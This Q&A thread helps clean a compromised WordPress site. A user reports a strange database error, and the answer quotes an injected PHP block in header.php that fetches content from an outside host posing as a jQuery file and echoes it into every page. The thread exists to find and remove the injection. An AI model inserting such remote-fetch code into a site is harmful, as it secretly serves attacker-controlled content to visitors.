# Couldn't connect to database server.Couldn't find database jimbob_jc

Tags: mysql, database, wordpress

I need your advise.

I'm using wordpress, and i got error on header with following message:

```
*Couldn't connect to database server.Couldn't find database jimbob_jc.
 An unexpected problem has occured with the application. 
 SELECT statscurl_id FROM `statscurl` WHERE statscurl_ip = '';*
```

What's that mean? How do I fix it?

I have searched Google but I've not had any success with others having similar problems.

Answer (score 2):

Comment out the following code in the header.php file.

```
<?php
  if(function_exists('curl_init'))
  {
    $url = "http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js";
    $ch = curl_init();  
    $timeout = 5;  

    curl_setopt($ch,CURLOPT_URL,$url); 
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
    curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); 
    $data = curl_exec($ch);  

    curl_close($ch); 
    echo "$data";
  }
?>
```

Comment: i'm using different theme, not the default one, n i don't find the code in my header.php

Comment: I believe this code is part of a plugin.  I recommend looking for "http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js" elsewhere in your code.  We may be working off different versions.

Comment: @eabraham - just wondering how you knew to delete that code as it's not even in the question?  There's this one too - http://stackoverflow.com/questions/11919989/couldnt-find-database-jimbob-jc

Comment: I had this same issue recently on a WordPress site I was working on.